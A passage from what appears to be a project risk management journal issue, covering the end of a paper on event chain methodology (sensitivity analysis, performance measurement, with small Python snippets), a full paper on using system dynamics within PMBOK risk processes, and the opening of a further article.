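# k_i: Spearman rank order correlation between total project duration
# and the duration of activity i.
k = np.array([spearmanr(total_duration, D_evt[:, i])[0] for i in range(n_acts)])

# D_cum = sum over activities of (D'_i - D_i) * k_i, evaluated per trial
# and summarised here by its mean across trials.
D_cum = ((D_evt - D) * k).sum(axis=1)
print("mean cumulative impact on duration (days):", round(D_cum.mean(), 2))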
Figure 6: Critical Events and Event Chains (sensitivity chart of correlation coefficient K and event cost per event).
Critical events or critical event chains can be visualized using a sensitivity chart, as shown in Figure 6. This chart represents events affecting cost in the schedule shown in Figure 2. Event 1 occurs in Task 1 (probability 47%) and Task 3 (probability 41%). Event 3 occurs in Task 3 (probability 50%) and Event 2 occurs in Task 2 (probability 10%). All events are independent. The impact of all these events is "restart task". All activities have the same variable cost of $6,667; therefore, the total project cost without risks and uncertainties equals $20,000. The total project cost with risks, as a result of the analysis, equals $30,120. The cost of Event 1 is $5,300, of Event 2 $3,440, and of Event 3 $1,380. Because this schedule model does not include fluctuations for activity cost, the sum of the event costs equals the difference between the original cost and the cost with risks and uncertainties ($10,120).
Critical events and event chains can be used to perform a reality check: if the probabilities and outcomes of events are properly defined, the most important risks, based on subjective expert judgment, should emerge as critical risks as a result of the quantitative analysis.
Principle 6: Project Performance Measurement
with Event and Event Chains
Monitoring the progress of activities ensures that updated information is used to perform the analysis. While
this is true for all types of analysis, it is a critical principle
of event chain methodology. During the course of the
project, using actual performance data, it is possible to recalculate the probability of occurrence and the moment of the
events. The analysis can be repeated to generate a new
project schedule with updated costs or durations.
But what should one do if the activity is partially completed and certain events are assigned to the activity? If the
event has already occurred, will it occur again? Or vice versa,
if nothing has occurred yet, will it happen?
There are three distinct approaches to this problem:
1. Probabilities of a random event in a partially completed activity stay the same regardless of the outcome of previous events. This mostly applies to external events, which cannot be affected by project stakeholders. Suppose it was originally determined that a "bad weather" event could occur 10 times during the course of a one-year construction project. After half a year, bad weather has occurred 8 times. For the remaining
half year, the event could still occur 5 times. This approach is related to the psychological effect called the "gambler's fallacy", the belief that a successful outcome is due after a run of bad luck [42].
2. Probabilities of events in a partially completed activity depend on the moment of the event. If the moment of the risk is earlier than the moment when the actual measurement is performed, the event will not affect the activity. For example, the activity "software user interface development" takes 10 days. The event "change of requirements" can occur at any time during the course of the activity and can cause a delay (a uniform distribution of the moment of event). 50% of the work is completed within 5 days. If the probabilistic moment of the event happens to fall between the start of the activity and 5 days, the event will be ignored (it will not cause any delay). In this case, the probability that the event will occur is reduced and eventually becomes zero as the activity approaches completion (see the short sketch after this list).
3. Probabilities of events need to be defined by the subjective judgment of project managers or other experts at
any stage of an activity. For example, the event "change of
requirements" has occurred. It may occur again depending
on many factors, such as how well these requirements are
defined and interpreted and the particular business situation. To implement this approach, excited states of activities should be explicitly subscribed or not subscribed to certain
events. For example, a new excited state after the event
"change of requirements" may not be subscribed to this
event again, and as a result this event will not affect the
activity a second time.
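For the second approach, under the uniform-moment assumption of the example above, the remaining probability of the event can be read off directly from the fraction of the activity still to be performed. A minimal sketch (the 40% original probability is an invented figure):

def remaining_event_probability(p_original: float, percent_complete: float) -> float:
    """Probability that the event still affects the activity when its moment is
    uniformly distributed over the activity and part of the work is already done."""
    # Moments falling in the completed part are ignored, so only the remaining
    # fraction of the activity can still trigger the event.
    return p_original * (1.0 - percent_complete)

# A "change of requirements" event with an assumed original probability of 40% on a
# 10-day activity: after 5 days (50% complete) the remaining probability is 20%,
# and it falls to zero as the activity approaches completion.
print(remaining_event_probability(0.40, 0.5))   # 0.2
print(remaining_event_probability(0.40, 1.0))   # 0.0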
The chance that the project will meet a specific deadline can be monitored and presented on a chart such as the one shown in Figure 7. The chance changes constantly as a result of various events and event chains; in most cases, it decreases over time. However, risk response efforts, such as risk mitigation, can increase the chance of successfully meeting a project deadline. The chance of the project meeting the deadline is constantly updated as a result of the quantitative analysis, based on the original assessment of the project uncertainties and the actual project performance data.
Figure 7: Monitoring Chance of Project Completion on a Certain Date.
In the critical chain method, the constant change in the size of the project buffer is monitored to ensure that the project is on track. In event chain methodology, the chance of the project meeting a certain deadline during different phases
of the project serves a similar purpose: it is an important
indicator of project health. Monitoring the chance of the
project meeting a certain deadline does not require a project
buffer. It is always possible to attribute particular changes
in the chance of meeting a deadline to actual and forecasted
events and event chains, and as a result, mitigate their negative impact.
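The deadline indicator itself is simply the share of Monte Carlo trials in which the simulated finish date does not exceed the deadline, recomputed whenever the schedule and event data are updated. A tiny illustration with invented numbers:

import numpy as np

def chance_of_meeting_deadline(finish_days: np.ndarray, deadline_day: float) -> float:
    """Fraction of Monte Carlo trials in which the project finishes on or before the deadline."""
    return float(np.mean(finish_days <= deadline_day))

rng = np.random.default_rng(2)
finish_days = rng.normal(62.0, 6.0, size=10_000)   # simulated project finish, in days
print(round(chance_of_meeting_deadline(finish_days, deadline_day=70.0), 2))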
6 Conclusions
Event chain methodology is designed to mitigate the
negative impact of cognitive and motivational biases related
to the estimation of project uncertainties:
• The task duration, start and finish time, cost, and other project input parameters are influenced by motivational factors, such as total project duration, to a much greater extent than events and event chains. This occurs because events cannot be easily translated into duration, finish time, etc. Therefore, Event chain methodology can help to overcome the negative effects of selective perception, in particular the confirmation bias and, to a certain extent, the planning fallacy and overconfidence.
• Event chain methodology relies on the estimation of duration based on best-case scenario estimates and does not necessarily require low, base, and high estimates or a statistical distribution, and therefore mitigates the negative effect of anchoring.
• The probability of events can be easily calculated based on historical data, which can mitigate the effect of the availability heuristic. Compound events can be easily broken into smaller events. The probability of events can be calculated using a relative frequency approach, where probability equals the number of times an event occurs divided by the total number of possible outcomes. In classic Monte Carlo simulations, the statistical distribution of input parameters can also be obtained from historical data; however, the procedure is more complicated and is often not used in practice.
Event chain methodology allows taking into account factors that are not analyzed by other schedule network analysis techniques: the moment of an event, chains of events, delays in events, the execution of mitigation plans, and others. Complex relationships between different events can be visualized using event chain diagrams and state tables, which simplifies event and event chain identification.
Finally, Event chain methodology includes techniques designed to incorporate new information about actual project performance into the original project schedule and therefore constantly improve the accuracy of the schedule during the course of a project. Event chain methodology offers practical solutions for resource leveling, managing mitigation plans, and correlations between events and other activities.
Event chain methodology is a practical approach to
scheduling software projects that contain multiple uncertainties. A process that utilizes this methodology can easily be used in different projects, regardless of size and complexity. Scheduling using Event chain methodology is an easy-to-use process, which can be performed using off-the-shelf software tools. Although Event chain methodology is a relatively new approach, it is actively used in
many organizations, including large corporations and government agencies.
References
[1] B. Flyvbjerg, M.K.S. Holm, S.L. Buhl. Underestimating costs in public works projects: Error or Lie? Journal of the American Planning Association, vol. 68, no.
3, pp. 279-295, 2002.
[2] B. Flyvbjerg, M.K.S. Holm, S.L. Buhl. What causes
cost overrun in transport infrastructure projects? Transport Reviews, 24(1), pp. 3-18, 2004.
[3] B. Flyvbjerg, M.K.S. Holm. How inaccurate are demand forecasts in public works projects? Journal of
the American Planning Association, vol. 78, no. 2, pp.
131-146, 2005.
[4] L. Virine, M. Trumper. Project Decisions: The Art and Science. Management Concepts, Vienna, VA, 2007.
[5] R. Buehler, D. Griffin, M. Ross. Exploring the "planning fallacy": Why people underestimate their task
completion times. Journal of Personality and Social
Psychology, 67, 366-381, 1994.
[6] D. Lovallo, D. Kahneman. Delusions of success: how
optimism undermines executives’ decisions, Harvard
Business Review, July Issue, pp. 56-63, 2003.
[7] A. Tversky, D. Kahneman. Judgment Under Uncertainty: Heuristics and biases. Science, 185, 1124-1130,
1974.
[8] G.E. McCray, R.L. Purvis, C.G. McCray. Project Management Under Uncertainties: The Impact of Heuristics and Biases. Project Management Journal. Vol. 33,
No. 1. 49-57, 2002.
[9] A. Tversky, D. Kahneman. Availability: A heuristic for
judging frequency and probability. Cognitive Psychology, 5, 207-232, 1973.
[10] J.S. Carroll. The effect of imagining an event on expectations for the event: An interpretation in terms of
availability heuristic. Journal of Experimental Psychology, 17, 88-96, 1978.
[11] D. Cervone, P.K. Peake. Anchoring, efficacy, and action: The influence of judgmental heuristics of selfefficacy judgments. Journal of Personality and Social
Psychology, 50, 492-501, 1986.
[12] S. Plous. The Psychology of Judgment and Decision
Making, McGraw-Hill, 1993.
[13] P.C. Wason. On the failure to eliminate hypotheses in
a conceptual task. Quarterly Journal of Experimental
Psychology, 12, 129-140, 1960.
[14] J. St. B. T. Evans, J.L. Barston, P. Pollard. On the conflict between logic and belief in syllogistic reasoning.
Memory and Cognition, 11, 295-306, 1983.
[15] R.K. Wysocki, R. McGary. Effective Project Management: Traditional, Adaptive, Extreme, 3rd Edition, John
Wiley & Sons Canada, Ltd., 2003.
[16] Project Management Institute. A Guide to the Project
Management Body of Knowledge (PMBOK® Guide),
Fourth Edition, Newtown Square, PA: Project Management Institute, 2008.
[17] R.T. Clemen. Making Hard Decisions, 2nd edition, Brooks/Cole Publishing Company, Pacific Grove, CA, 1996.
[18] G.W. Hill. Group versus individual performance: Are
N + 1 heads better than one? Psychological Bulletin,
91, 517-539, 1982.
[19] D. Hillson. Use a risk breakdown structure (RBS) to
understand your risks. In Proceedings of the Project
Management Institute Annual Seminars & Symposium,
October 3-10, 2002, San Antonio, TX, 2002.
[20] T. Kendrick. Identifying and Managing Project Risk:
Essential Tools For Failure-Proofing Your Project,
AMACOM, a division of American Management Association, 2nd revised Edition. New York, 2009.
[21] W. Scheinin, R. Hefner. A Comprehensive Survey of
Risk Sources and Categories, In Proceedings of Space
Systems Engineering and Risk Management Symposiums. Los Angeles, CA: pp. 337-350, 2005.
[22] D.T. Hulett. Schedule risk analysis simplified, PM
Network, July 1996, 23-30, 1996.
[23] D.T. Hulett. Project Schedule Risk Analysis: Monte Carlo Simulation or PERT? PM Network, February 2000, p. 43, 2000.
[24] J. Goodpasture. Quantitative Methods in Project Management, J.Ross Publishing, Boca Raton, FL, 2004.
[25] J. Schuyler. Risk and Decision Analysis in Projects,
2nd Edition, Project Management Institute, Newton
Square, PA, 2001.
[26] T. Williams. Why Monte Carlo simulations of project
networks can mislead. Project Management Journal,
September 2004, 53-61, 2004.
[27] G.A. Quattrone, C.P. Lawrence, D.L. Warren, K.
Souze-Silva, S.E. Finkel, D.E. Andrus. Explorations
in anchoring: The effects of prior range, anchor extremity, and suggestive hints. Unpublished manuscript.
Stanford University, Stanford, 1984.
[28] D.T. Hulett. Practical Schedule Risk Analysis. Gower
Publishing, 2009.
[29] D.T. Hulett. Integrated Cost-Schedule Risk Analysis.
Gower Publishing, 2011.
[30] E. Goldratt. Critical Chain. Great Barrington, MA:
North River Press, 1997.
[31] M. Srinivasan, W. Best, S. Chandrasekaran. Warner
Robins Air Logistics Center Streamlines Aircraft Repair and Overhaul. Interfaces, 37(1). 7-21, 2007.
[32] P. Wilson, S. Holt. Lean and Six Sigma — A Continuous Improvement Framework: Applying Lean, Six
Sigma, and the Theory of Constraints to Improve
Project Management Performance. In Proceedings of
the 2007 PMI College of Scheduling Conference, April
15-18, Vancouver, BC, 2007.
[33] D.T. Hulett, D. Hillson. Branching out: decision trees
offer a realistic approach to risk analysis, PM Network,
May 2006, pp 36-40, 2006.
[34] J. Arlow, I. Neustadt. Enterprise Patterns and MDA:
Building Better Software with Archetype Patterns and
UML. Addison-Wesley Professional, 2003.
[35] G. Booch, J. Rumbaugh, I. Jacobson. The Unified Modeling Language User Guide, 2nd edition, Addison-Wesley Professional, 2005.
[36] B. Flyvbjerg. From Nobel Prize to project management: getting risks right. Project Management Journal, August 2006, pp 5-15, 2006.
[37] R. Shankar. Principles of Quantum Mechanics, Second Edition, New York: Springer, 1994.
[38] E.B. Manoukian. Quantum Theory: A Wide Spectrum.
New York: Springer, 2006.
[39] M. Fowler. Patterns of Enterprise Application Architecture, Addison-Wesley Professional, 2002.
[40] R.C. Martin. Agile Software Development, Principles,
Patterns, and Practices. Prentice Hall, 2002.
[41] Project Management Institute. A Guide to the project
management body of knowledge (PMBOK). Newtown
Square, PA. Project Management Institute, Inc., 2004.
[42] A. Tversky, D. Kahneman. Belief in the law of small
numbers. Psychological Bulletin, 76, 105-110, 1971.
Revisiting Managing and Modelling of Project Risk Dynamics
— A System Dynamics-based Framework1
Alexandre Rodrigues
The fast-changing environment and the complexity of projects have increased the exposure to risk. The PMBOK (Project
Management Body of Knowledge) standard from the Project Management Institute (PMI) proposes a structured risk
management process, integrated within the overall project management framework. However, unresolved difficulties call
for further developments in the field. In projects, risks occur within a complex web of numerous interconnected causes and
effects, which generate closed chains of feedback. Project risk dynamics are difficult to understand and control and hence
not all types of tools and techniques are appropriate to address their systemic nature. As a proven approach to project
management, System Dynamics (SD) provides this alternative view. A methodology to integrate the use of SD within the
established project management process has been proposed by the author. In this paper, this is further extended to integrate the use of SD modelling within the PMBOK risk management process, providing a useful framework for the effective
management of project risk dynamics.
Keywords: PMBOK Framework, Project Management
Body of Knowledge, Project Risk Dynamics, Risk Management Processes, SYDPIM methodology, System Dynamics.
Author
Alexandre Rodrigues is an Executive Partner of PMO Projects
Group, an international consulting firm based in Lisbon
specialized in project management, with operations and offices
in the UK, Africa and South America. He is also a senior
consultant with the Cutter Consortium. Dr. Rodrigues is PM
Ambassador™ and International Correspondent for the
international PMForum. He was the founding President of the
PMI Portugal Chapter and served as PMI Chapter Mentor for
four years. He was an active member of the PMI teams that
developed the 3rd edition of the PMBOK® Guide and the
OPM3® model for organizational maturity assessment. He was
a core team member for the PMI Practice Standard for Earned
Value Management, which has just been released. He holds a
PhD from the University of Strathclyde (UK), specializing in
the application of System Dynamics to Project Management.
<[email protected]>
1 Risk Management in Projects
1.1 Overview
In response to the growing uncertainty in modern
projects, over the last decade the project management community has developed project-specific risk management
frameworks. The last edition of PMI’s body of knowledge
(the PMBOK® Guide [1]) presents perhaps the most complete and commonly accepted framework, which has been
further detailed in the Practice Standard for Project Risk
Management [2]. Further developments complement this
framework, such as the establishment of project risk management maturity models to help organizations evaluate and
improve their ability to control risks in projects. However,
most organizations still fall short of implementing these
structured frameworks effectively. In addition, there are certain types of risks that are not handled properly by the traditional tools and techniques proposed.
1.2 Current Framework for Project Risk Management
The fourth and latest edition of PMI’s Project Management Body of Knowledge [1] considers six risk management processes: plan risk management, identify risks, perform qualitative risk analysis, perform quantitative risk
analysis, plan risk responses, and monitor and control risks.
While this framework provides a comprehensive approach
to problem solving, its effectiveness relies on the ability of
these processes to cope with the multidimensional uncertainty of risks: identification, likelihood, impact, and occurrence. The majority of the traditional tools and techniques
used in these processes were not designed to address the
increasingly systemic nature of risk uncertainty in modern
projects. This limitation calls for further developments in the field.
1.3 Project Risk Dynamics
Risks are dynamic events. Overruns, slippage and other
problems can rarely be traced back to the occurrence of a
single discrete event in time. In projects, risks take place
within a complex web of numerous interconnected causes
and effects which generate closed chains of causal feedback.
1 This paper derives from an article entitled "Managing and Modelling Project Risk Dynamics - A System Dynamics-based Framework", which was presented by the author at the Fourth European Project Management Conference, PMI Europe 2001 [3]. As the use of computer simulation based on System Dynamics to support Project Risk Management in a systematic manner is still in its early phases, most likely due to the high level of organizational maturity and expertise required by System Dynamics modelling, the author decided to revisit the ideas contained in the aforementioned paper.
Figure 1: Example of a Project Feedback Structure focused on Scope Changes.
Risk dynamics are generated by the various feedback loops
that take place within the project system.
The feedback perspective is particularly relevant to understand, explain, and act upon the behaviour of complex
social systems. Its added value for risk management is that
it sheds light on the systemic nature of risks. No single factor can be blamed for generating a risk, nor can management
find effective solutions by acting only upon individual factors. To understand why risks emerge and to devise effective solutions, management needs to look at the whole. As
an example of this analysis, Figure 1 shows the feedback
structure of a project, focused on the dynamics that can generate risks related to requirements changes imposed by the
client. This understanding of risks is crucial for identifying,
assessing, monitoring and controlling them better (see [4]
for more details).
Feedback loops identified as "R+" are reinforcing effects (commonly referred to as "snowball effects"), and the
ones identified as "B-" are balancing effects (e.g. control
decisions). The arrows indicate cause-effect relationships,
and have an "o" when the cause and the direct effect change
in the opposite direction. The arrows in red identify the
cause-effect relationships likely to generate risks. This type
of diagram is referred to as "Influence Diagram" (ID).
If we ask the question "What caused the quality problems and delays?", the right answer is not "staff fatigue", "poor QA implementation" or "schedule pressure". It is the whole feedback structure that, over time and under certain conditions, generated the quality problems and delays. In other words, the feedback structure causes problems to unfold over time. To manage systemic risks effectively, it is necessary to act upon this structure. This type of action consists of eliminating problematic feedback loops and creating beneficial ones.
However, project risk dynamics are difficult to understand and control. The major difficulties have to do with
the subjective, dynamic and multi-factor nature of systemic
risks. Feedback effects include time-delays, non-linear effects and subjective factors. Not all types of tools and techniques are appropriate to address and model problems of
this nature. The more classical modelling approaches tend
to deliver static views based on top-down decomposition
and bottom-up forecast, while focusing on the readily quantifiable factors. Managing project risk dynamics requires a
different approach, based on a systemic and holistic perspective, capable of capturing feedback and of quantifying
the subjective factors where relevant.
2 A Proposed Framework for Managing and Modelling Project Risk Dynamics
2.1 Overview
Managing systemic risks requires an approach supported
by specialized tools and techniques. System Dynamics (SD)
is a simulation modelling approach aimed at analysing the
systemic behaviour of complex social systems, such as
projects. The framework proposed here is based on the integrated use of SD within the existing project risk management framework, supporting the six risk management processes proposed by the PMBOK [1]. This is an extension to
the more general methodology developed by the author,
called SYDPIM [5], which integrates the use of SD within
the generic project management framework. The use of SD
is proposed as a complementary tool and technique to address systemic risks.
2.2 System Dynamics
SD was developed in the late 50s [6] and has enjoyed a
sharp increase in popularity in the last ten years. Its application to project management has also been growing impressively, with numerous successful applications to real-life projects [7]. An overview of the SD methodology can be found in [5] and [8].
The SD modelling process starts with the development of qualitative influence diagrams and then moves into the development of quantitative simulation models. These models allow for a flexible representation of complex scenarios, such as mixing the occurrence of various risks with the implementation of mitigating actions. The model simulation generates patterns of behaviour over time. Figure 2 provides an example of the output produced by an SD project model when simulating the design phase of a software project under two different scenarios.
SD models work as experimental management laboratories, wherein decisions can be devised and tested in a safe
environment. Their feedback perspective and "what-if" capability provide a powerful means through which systemic
problems can be identified, understood and managed.
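To give a flavour of what such a quantitative simulation involves, here is a deliberately tiny stock-and-flow sketch of a design phase with a rework cycle. All equations and parameter values are invented for illustration; this is not the model behind Figure 2.

DT = 0.25                     # time step (weeks)
STEPS = 480                   # 120 simulated weeks
STAFF = 5.0                   # people
PRODUCTIVITY = 2.0            # design tasks per person per week
ERROR_FRACTION = 0.2          # share of completed work that is actually flawed
DISCOVERY_TIME = 8.0          # average weeks before rework is discovered

work_to_do, work_done, undiscovered_rework = 1000.0, 0.0, 0.0
history = []

for step in range(STEPS):
    progress = min(STAFF * PRODUCTIVITY, work_to_do / DT)      # tasks/week
    rework_discovery = undiscovered_rework / DISCOVERY_TIME    # tasks/week
    # Integrate the stocks (Euler integration, as SD tools typically do).
    work_to_do += (rework_discovery - progress) * DT
    work_done += progress * (1.0 - ERROR_FRACTION) * DT
    undiscovered_rework += (progress * ERROR_FRACTION - rework_discovery) * DT
    history.append((step * DT, work_done, undiscovered_rework))

t, done, rework = history[-1]
print(f"week {t:.0f}: designs completed ~ {done:.0f}, errors awaiting rework ~ {rework:.0f}")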
Figure 2: Example of Behaviour Patterns produced by an SD Project Model: (a) simulation "as planned"; (b) simulation "with scope changes".
3 The SYDPIM Framework
Figure 3: Overview of the SYDPIM Process Logic.
The SYDPIM methodology integrates the use of SD modelling within the established project management process. A detailed description can be found in [5] (see also [9] for a summary description). SYDPIM comprises two main methods: the model development method and the project management method. The first is aimed at supporting the development of valid SD models for a specific project. The latter supports the use of this model embedded within the
traditional project management framework, and formally
integrated with the PERT/CPM models. An overview of the
process logic is provided in Figure 3. The arrows in black
identify the flows within the traditional project control process. SYDPIM places the use of an SD project model at the
core of this process, enhancing both planning and monitoring and thereby the overall project control.
The use of the SD model adds new steps to the basic
control cycle (the numbers indicate the sequence of the
steps). In planning, the SD model is used to pro-actively
test and improve the current project plan. This includes forecasting and diagnosing the likely outcome of the current
plan, uncovering assumptions (e.g. expected productivity), testing the plan's sensitivity to risks, and testing the effectiveness of
mitigating actions. In monitoring, the SD model is used to
explain the current project outcome and status, to enhance
progress visibility by uncovering important intangible information (e.g. undiscovered rework), and to carry out retrospective "what-if" analysis for process improvement while
the project is underway. Overall, the SD model works as a
test laboratory to assess the future plans and to diagnose the
project past. The model also works as an important repository of project history and metrics.
4 Using SYDPIM to manage Risk Dynamics within
the PMBOK Framework
According to the SYDPIM framework, the SD model
can be used in various ways to support the six risk management processes identified in the PMBOK. Given the limited size of this paper, this is now briefly described separately for each risk process. A more detailed explanation is
forthcoming in the literature.
Plan Risk Management
The implementation of SYDPIM within risk management planning allows for the definition of the appropriate
level of structuring for the risk management activity, and
for the planning of the use of SD models within this activity.
Adjusting the level of structuring for the risk management activity is crucial for the practical implementation of
the risk management process. An SD project model can be
used to analyse this problem. Various scenarios reflecting
different levels of structuring can be simulated and their full impacts quantified. Typically, a "U-curve" will result
from the analysis of these scenarios, ranging from pure ad
hoc to over-structuring. An example of the use of an SD
model for this purpose can be found in [3].
Identify Risks
An SD project model can support risk identification in
two ways: at the qualitative level, through the analysis of
influence diagrams, risks that result from feedback forces
can be identified; at the quantitative level, intangible project
status information (e.g. undiscovered rework) and assumptions in the project plan can be uncovered (e.g. required
productivity).
Risks can be identified in an influence diagram as events
that result from: (i) balancing loops that limit a desired
growth or decay (e.g. the lack of available resources leads
to a balancing loop that limits the potential growth of work
accomplishment); (ii) reinforcing loops that lead to undesired growth or decay (e.g. schedule pressure leads to QA
cuts, which in turn lead to more rework and delays, thereby
reinforcing schedule pressure; see "R+" loop L3 in figure
1); (iii) external factors that exacerbate any of these two
types of feedback loops (e.g. training delays exacerbate the
following reinforcing loop: "the more you hire in the later
stages, the worse the slippage due to training overheads.").
This type of analysis also allows for risks to be managed as
opportunities: feedback loops can be put to work in favour
of the project.
SD simulation models allow the project manager to
check whether and how certain feedback loops previously
identified as "risk generators" will affect the project. In this
way, irrelevant risks can be eliminated, preventing unnecessary mitigating efforts. Secondly, the calibration of the
SD model uncovers important quantitative information
about the project status and past, which typically is not
measured because of its intangible and subjective nature.
In this way, it forces planning assumptions to be made explicit, thereby identifying potential risks.
Perform Qualitative Risk Analysis
Influence diagrams can help to assess risk probability
and impacts through feedback loop analysis. Given a specific risk, it is possible to identify in the diagram which
feedback loops favour or counter the occurrence of the risk.
Each feedback loop can be seen as a dynamic force that
pushes the project outcome towards (or away) from the risk
occurrence. The likelihood and the impact of each risk can
be qualitatively inferred from this feedback loop analysis.
An SD simulation model can be used to identify the specific scenarios in which a risk would occur (i.e. likelihood).
Regarding impact, with simple models and preliminary calibrations, quantitative estimates can be taken as qualitative
indications of the order of magnitude of the risk impacts.
Perform Quantitative Risk Analysis
In quantifying risks, an SD project model provides two
additional benefits over traditional models: first, it delivers
a wide range of estimates, and secondly these estimates reflect the full impacts of risk occurrence, including both direct and indirect effects.
Quantifying the impact of a risk consists in calibrating
the model for a scenario where the risk occurs (e.g. scope
changes), and then simulating the project. One can virtually
analyse the impact of the risk occurrence in any project variable, by comparing the produced behaviour pattern with
the one obtained when a risk-absent scenario is simulated.
For example, Figure 2(b) shows the behaviour patterns produced by an SD project model when scope changes are introduced by the client over time (curve 4). These patterns can be compared with the ones of Figure 2(a), which shows
the scenario where no scope changes are introduced. This
type of analysis allows the project manager to identify a
risk’s impact on various aspects of the project (and overtime; not just the final value). In addition, the feedback nature of the SD model ensures that both direct and indirect
impacts of risks are quantified – ultimately, when a risk occurs it will affect everything in the project, and the SD model
captures the full impacts.
An SD project model generally includes variables related to the various project objectives (cost, time, quality,
and scope). One can therefore assess the risk impacts on all
dimensions of the project objectives. The SD model also
allows for scenarios combining several risks to be simulated, whereby their cross impacts are also captured. Sensitivity analysis can be carried out to analyse the project’s
sensitivity to certain risks as well as to their intensity (e.g.
what is the critical productivity level below which problems will escalate?).
Plan Risk Responses
Influence diagrams and SD simulation models are very
powerful tools to support the development of effective risk
responses. They provide three main distinctive benefits: (i)
support the definition and testing of complex risk-response
scenarios, (ii) provide the feedback perspective for the identification of response opportunities, and (iii) they are very
effective for diagnosing and understanding better the multifactor causes of risks; these causes can be traced back the
through the chains of cause-and-effect, with counter-intuitive solutions often being identified.
Influence diagrams provide the complementary feedback
perspective. Therefore, the power to influence, change and
improve results rests on acting on the project feedback structure. Risk responses can be identified as actions that eliminate vicious loops, or attenuate or reverse their influence
on the project behaviour. By looking at the feedback loops
and external factors identified as risks, the project manager
can devise effective responses.
An SD simulation model provides a powerful test-bed
where, at low cost and in a safe environment, various risk responses can be developed, their effectiveness can be tested for the full impacts, and they can be improved prior to implementation.
Risk Monitoring and Control
An SD project model can be used as an effective tool for
risk monitoring and control. The model can be used to identify early signs of risk emergence which otherwise would
remain unperceived until problems were aggravated. The
implementation of risks responses can also be monitored
and their effectiveness can be evaluated.
Risk occurrence can be monitored by analysing the
project behavioural aspects of concern (i.e. the risks' "symptoms"). An SD model has the ability to produce many of
these patterns, which in the real world are not quantified
due to their intangible and subjective nature (the amount of
undetected defects flowing throughout the development lifecycle is a typical example). The SD model provides a wide
range of additional risk triggers, thereby enhancing the effectiveness of monitoring risk occurrence.
The implementation of a risk response can be characterized by changes in project behaviour. These changes can be
monitored in the model to check whether the responses are
being implemented as planned. The effectiveness of the risk
response (i.e. the expected impacts) can be monitored in the
same way. When deviations occur, the SD model can be
used to diagnose why the results are not as expected.
5 Placing System Dynamics in the PMBOK
Framework
System Dynamics modelling is a very complete technique and tool that covers a wide range of project management needs by addressing the systemic issues that influence
and often dominate the project outcome. Its feedback and
endogenous perspective of problems is very powerful, widening the range for devising effective management solutions.
It is an appropriate approach to manage and model project
risk dynamics, for which most of the traditional modelling
techniques are inappropriate. SD therefore has a strong potential to provide a number of distinctive benefits to the
overall project management process. One of the necessary
conditions is that its application is integrated with the traditional models within that process. The SYDPIM methodology was developed for that purpose, integrating the use of
SD project models with the traditional PERT/CPM models,
based on the WBS and OBS structures [5]. SYDPIM provides SD models with specific roles within the project control process. One of these roles is to support the risk management activity.
As a proven tool and technique already applied with
success to various real projects [10], SD needs to be properly placed in the PMBOK. This paper briefly discussed its
potential roles within the six project risk management processes presented in the latest edition of the PMBOK [1]. It is
concluded that SD has potential to provide added value to
these processes, in particular to risk identification, risk quantification and to response planning.
Influence diagrams are already proposed by the PMBOK
for risk identification (process 11.2). System Dynamics
modelling is further proposed in the specialized Practice
Standard for Project Risk Management [2] (PMI 2009), also
for risk identification. This is an important acknowledgement that systemic problems in projects may require specialized techniques, different from and complementary to
the more traditional ones. However, from practical experience in real projects and extensive research carried out in
this field, it is the author’s opinion that the range of application of SD within the project management process is much
wider. There are many other processes in the PMBOK
framework where SD can be employed as a useful tool and
technique. These benefits can be maximized based on the
SYDPIM methodology.
It is also the author’s opinion that by implementing the
SYDPIM-based risk framework proposed here, the project
manager can take better advantage of the benefits offered
by System Dynamics modelling, while enhancing the performance of the existing risk management process.
The use of System Dynamics in the field of Project Management, and in particular for Project Risk Management, has been attracting growing attention since the author first proposed an integrated process-based approach [3], as reported
in the literature.
References
[1] Project Management Institute (PMI). A Guide to the
Project Management Body of Knowledge, Project
Management Institute, North Carolina, 2008.
[2] Project Management Institute (PMI). Practice Standard for Project Risk Management, Project Management
Institute, North Carolina, 2009.
[3] A. Rodrigues. "Managing and Modelling Project Risk
Dynamics - A System Dynamics-based Framework ".
Proceedings of the 4th European PMI Conference 2001,
London, United Kingdom, 2001.
[4] A.G. Rodrigues. "Finding a common language for global software projects." Cutter IT Journal, 1999.
CEPIS UPGRADE Vol. XII, No. 5, December 2011
39
Risk Management
[5] A. Rodrigues. "The Application of System Dynamics
to Project Management: An Integrated Methodology
(SYDPIM)". PhD Dissertation Thesis. Department of
Management Sciences, University of Strathclyde, 2000.
[6] J. Forrester. Industrial Dynamics, MIT Press, Cambridge, US, 1961.
[7] A. Rodrigues. "The Role of System Dynamics in
Project Management: A Comparative Analysis with
Traditional Models." 1994 International System Dynamics Conference, Stirling, Scotland, 214-225, 1994.
[8] M.J. Radzicki and R. Taylor. "Origin of System Dynamics: Jay W. Forrester and the History of System
Dynamics". In: U.S. Department of Energy’s Introduction to System Dynamics. Retrieved 23 October 2008.
[9] A. Rodrigues. "SYDPIM – A System Dynamics-based
Project-management Integrated Methodology." 1997
International System Dynamics Conference: "Systems
Approach to Learning and Education into the 21st Century", Istanbul, Turkey, 439-442, 1997.
[10] A.G. Rodrigues, J. Bowers. "The role of system dynamics in project management." International Journal
of Project Management, 14(4), 235-247, 1996.
Additional Related Literature
• C. Pavlovski, B. Moore, B. Johnson, R. Cattanach, K. Hambling, S. Maclean. "Project Risk Forecasting Method." International Conference on Software Development (SWDC-REK), University of Iceland, Reykjavik, Iceland, May 27 - June 1, 2005.
• D.A. Hillson. "Towards a Risk Maturity Model." International Journal of Project & Business Risk Management, 1(1), 35-45, 1997.
• J. Morecroft. Strategic Modelling and Business Dynamics: A Feedback Systems Approach. John Wiley & Sons, ISBN 0470012862, 2007.
• A.G. Rodrigues, T.M. Williams. "System dynamics in project management: assessing the impacts of client behaviour on project performance." Journal of the Operational Research Society, Volume 49, Number 1, January 1998, pp. 2-15.
• Seng Chia. "Risk Assessment Framework for Project Management." Engineering Management Conference, 2006 IEEE International. Print ISBN: 1-4244-0285-9.
• P. Senge. The Fifth Discipline. Currency, ISBN 0-385-26095-4, 1990.
• J.D. Sterman. Business Dynamics: Systems Thinking and Modeling for a Complex World. McGraw Hill, ISBN 0-07-231135-5, 2000.
• J.R. Wirthlin. "Identifying Enterprise Leverage Points in Defense Acquisition Program Performance." Doctoral Thesis, MIT, Cambridge, USA, 2009.
Towards a New Perspective: Balancing Risk, Safety and Danger
Darren Dalcher
The management of risk has gradually emerged as a normal activity that is now a constituent part of many professions.
The concept of risk has become so ubiquitous that we continually search for risk-based explanations of the world around
us. Decisions and projects are often viewed through the lens of risk to determine progress, value and utility. But risk can
have more than one face depending on the stance that we adopt. The article looks at the implications of adopting different
